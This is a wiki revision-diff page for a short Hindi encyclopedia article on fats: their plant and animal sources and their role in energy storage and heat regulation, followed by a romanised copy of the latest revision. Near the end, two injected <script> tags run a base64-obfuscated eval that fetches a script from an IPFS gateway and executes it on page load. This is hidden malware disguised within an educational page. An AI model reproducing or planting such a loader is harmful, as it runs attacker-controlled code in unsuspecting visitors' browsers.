Difference between revisions of "वसा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('(अंग्रेज़ी:Fats) वसाएँ जटिल कार्बनिक [[...' के साथ नया पन्ना बनाया)
 
 
(10 intermediate revisions by 6 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Fats) वसाएँ जटिल कार्बनिक [[अम्ल|अम्लों]], वसीय अम्लों द्वारा निर्मिल [[यौगिक]] होते हैं तथा शाकाहारी तथा माँसाहारी दोनों प्रकार के भोजन से प्राप्त होती हैं। वनस्पति से यह नारियल, बादाम, मूँगफली, सरसों एवं अन्य तिलहन से तथा पुशुओं से यह मक्खन, पनीर, दूध तथा घी से प्राप्त होती है।  
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Fat) वसाएँ जटिल कार्बनिक [[अम्ल|अम्लों]], वसीय अम्लों द्वारा निर्मित [[यौगिक]] होते हैं तथा शाकाहारी तथा माँसाहारी दोनों प्रकार के भोजन से प्राप्त होती है। वनस्पति से यह [[नारियल]], बादाम, [[मूँगफली]], सरसों एवं अन्य [[तिलहन]] से तथा पशुओं से यह मक्खन, पनीर, [[दूध]] तथा [[घी]] से प्राप्त होती है।  
;<u>वसा की उपयोगिता</u>
+
;वसा की उपयोगिता  
शरीर में भोज्य [[पदार्थ]] वसा के रूप में संचित रहते हैं। वसा शरीर में [[ताप]] नियमन, कोशिकाकला निर्माण में भाग लेती है। कार्बोहाइड्रेट की कमी की स्थिति में वसा से [[ऊर्जा]] प्राप्त होती है।  
+
शरीर में भोज्य [[पदार्थ]] वसा के रूप में संचित रहते हैं। वसा शरीर में [[ताप]] नियमन, [[कोशिका]] निर्माण में भाग लेती है। [[कार्बोहाइड्रेट]] की कमी की स्थिति में वसा से [[ऊर्जा]] प्राप्त होती है।  
  
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 10: Line 10:
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
[[Category:नया पन्ना]]
+
{{रसायन विज्ञान}}
[[Category:जीव विज्ञान]]
 
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 +
[[Category:रसायन विज्ञान]]
 +
[[Category:पोषण]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:18, 21 February 2012

(aangrezi:Fat) vasaean jatil karbanik amloan, vasiy amloan dvara nirmit yaugik hote haian tatha shakahari tatha maansahari donoan prakar ke bhojan se prapt hoti hai. vanaspati se yah nariyal, badam, mooangaphali, sarasoan evan any tilahan se tatha pashuoan se yah makkhan, panir, doodh tatha ghi se prapt hoti hai.

vasa ki upayogita

sharir mean bhojy padarth vasa ke roop mean sanchit rahate haian. vasa sharir mean tap niyaman, koshika nirman mean bhag leti hai. karbohaidret ki kami ki sthiti mean vasa se oorja prapt hoti hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>